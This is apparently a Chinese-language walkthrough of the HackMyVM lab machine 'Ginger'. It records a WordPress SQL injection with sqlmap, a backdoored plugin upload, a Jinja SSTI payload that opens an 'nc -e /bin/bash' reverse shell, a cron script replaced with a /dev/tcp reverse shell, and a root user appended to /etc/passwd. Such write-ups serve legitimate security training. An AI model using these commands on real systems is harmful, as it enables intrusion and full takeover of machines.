52.Ginger

created: "2025-05-18 12:31"
tags:
  - HMV
Type: wp
难度: ⭐️⭐️⭐️⭐️⭐️
作者: cromiphi
aliases: 
系统: Linux
updated: "2025-05-19 15:09"

1. 基本信息^toc

1. 基本信息
2. 信息收集
- 2.1. wordpress sqli
- 2.2. 网站后台
- 2.3. 提权到 sarina
- 2.4. 提权到webmaster
- 2.5. ssti提权到webmaster
- 2.6. 定时任务提权caroline
- 2.7. caroline提权root
靶机链接 https://downloads.hackmyvm.eu/ginger.zip
作者 cromiphi
难度 ⭐️⭐️⭐️⭐️⭐️

2. 信息收集

┌──(root㉿kali)-[~/Desktop/hmv/Ginger]
└─# nmap -sCV 192.168.56.109 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 03:15 EDT
Nmap scan report for 192.168.56.109
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
|   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:EA:CD:54 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

┌──(root㉿kali)-[~/Desktop/hmv/Ginger]
└─# dirsearch -u http://192.168.56.109/ -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/hmv/Ginger/reports/http_192.168.56.109/__25-05-19_03-16-27.txt

Target: http://192.168.56.109/

[03:16:27] Starting: 
[03:16:50] 200 -    2KB - /wordpress/wp-login.php
[03:16:50] 200 -    3KB - /wordpress/

Task Completed

2.1. wordpress sqli

Pasted image 20250519152520
找个Exp利用即可
https://www.exploit-db.com/exploits/50663

python sqlmap.py  -u "http://192.168.56.109/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=adddetails&id=1&calid=1"

Pasted image 20250519154752

[1 entry]
+----+-------------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url                            | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+-------------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | http:\\/\\/192.168.0.14\\/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
+----+-------------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

用户密码 $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.
用户名： webmaster

破解hash
Pasted image 20250519160310

得到了密码：sanitarium

2.2. 网站后台

进了后台，自己传一个有漏洞插件执行命令弹shell即可
如果你不好找漏洞插件，那你只要在插件的压缩包里面传一个后门文件即可
比如我这里随便找了个插件压缩包，里面塞了一个后门文件 1.php
Pasted image 20250519174405
然后安装这个插件启动。
传了之后访问你插件的后面文件路径即可

http://192.168.56.110/wordpress/wp-content/plugins/插件名字/后门文件路径

然后弹shell就行了
Pasted image 20250519174251

2.3. 提权到 sarina

(remote) www-data@ginger:/$ sudo -l
Matching Defaults entries for www-data on ginger:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on ginger:
    (ALL : ALL) NOPASSWD: /usr/bin/sl

这个就是个火车，没有用
Pasted image 20250519174632

(remote) www-data@ginger:/home/sabrina$ cat password.txt 
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory

还有个照片

先看照片
Pasted image 20250519180019
提示这不是ctf 所以我们也没必要去捣鼓这个照片了

这里看了wp发现这个密码常在了内核日志中

(remote) www-data@ginger:/home/sabrina$ dmesg |grep sabrina
[    2.346603] sabrina:dontforgetyourpasswordbitch

2.4. 提权到webmaster

sabrina@ginger:/home$ sudo -l
Matching Defaults entries for sabrina on ginger:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabrina may run the following commands on ginger:
    (webmaster) NOPASSWD: /usr/bin/python /opt/app.py *


sabrina@ginger:/home$ cat /opt/app.py

from flask import Flask, request, render_template_string,render_template

app = Flask(__name__)
@app.route('/')
def hello_ssti():
    person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
    if request.args.get('name'):
        person['name'] = request.args.get('name')
    template = '''<h2>Hello %s!</h2>''' % person['name']
    return render_template_string(template,person=person)
def get_user_file(f_name):
    with open(f_name) as f:
        return f.readlines()
app.jinja_env.globals['get_user_file'] = get_user_file

if __name__ == "__main__":
    app.run(debug=True)

这里是一个rot13编码

sabrina@ginger:/home$ echo UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg== |base64 -d
Phevbhf? aivfvhz.pbz/pnerrefsabrina@ginger:/home$ 
sabrina@ginger:/home$ echo "Phevbhf? aivfvhz.pbz/pnerref" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Curious? nvisium.com/careers

没啥东西

这个python会开启一个存在ssti模版注入的网站
启动后弹shell即可

sabrina@ginger:/home$ sudo -u webmaster /usr/bin/python /opt/app.py *
 * Serving Flask app "app" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: on
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 303-692-316

2.5. ssti提权到webmaster

#端口扫描  方便操作
socat TCP-LISTEN:1111,fork TCP:127.0.0.1:5000
#反弹shell
http://192.168.56.110:1111/?name={{ self.__init__.__globals__.__builtins__.__import__('os').popen('nc -e /bin/bash 192.168.56.102 8888').read() }}

Pasted image 20250519182301

2.6. 定时任务提权caroline

然后利用pspy64 可以发现每分钟 caroline用户都会执行命令 bash /home/caroline/backup/backup.sh

Pasted image 20250519182819

(remote) webmaster@ginger:/home/caroline/backup$ ls -la
total 12
drwxrwx--- 2 caroline webmaster 4096 May 22  2021 .
drwxr-xr-- 5 caroline webmaster 4096 May 25  2021 ..
-rwxr-xr-x 1 caroline caroline    44 May 21  2021 backup.sh

然后删掉替换即可

(remote) webmaster@ginger:/home/caroline/backup$ cat backup.sh 
sh -i >& /dev/tcp/192.168.56.102/8889 0>&1

2.7. caroline提权root

(remote) caroline@ginger:/home$ sudo -l
Matching Defaults entries for caroline on ginger:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User caroline may run the following commands on ginger:
    (ALL : ALL) NOPASSWD: /srv/code
(remote) caroline@ginger:/home$ /srv/code

ida逆向分析一下这个
Pasted image 20250519213243
可以发现他会执行命令，给其他用户5秒钟的操作时间，可以对/etc/passwd 进行操作

那我们就可以在里面添加一个root级别的用户

#生成一个密码
(remote) caroline@ginger:/home$ openssl passwd 123456
.plP2.ShPb.iI

echo 'c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash' >> /etc/passwd

使用 & 把 /srv/code 挂后台，然后立即执行上面的命令添加后门用户

(remote) caroline@ginger:/home$ sudo -u root /srv/code &
[1] 11609
(remote) caroline@ginger:/home$ echo 'c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash' >> /etc/passwd
(remote) caroline@ginger:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sabrina:x:1000:1000:sabrina,,,:/home/sabrina:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
caroline:x:1002:1002:,,,:/home/caroline:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash
[1]+  Done                    sudo -u root /srv/code

(remote) caroline@ginger:/home$ su c1trus
Password:       
root@ginger:/home# whoami
root
root@ginger:/home# id
uid=0(root) gid=0(root) groups=0(root)
root@ginger:/home# 

root@ginger:~# cat root.txt 
ae426c9d237d676044e5cd8e8af9ef7f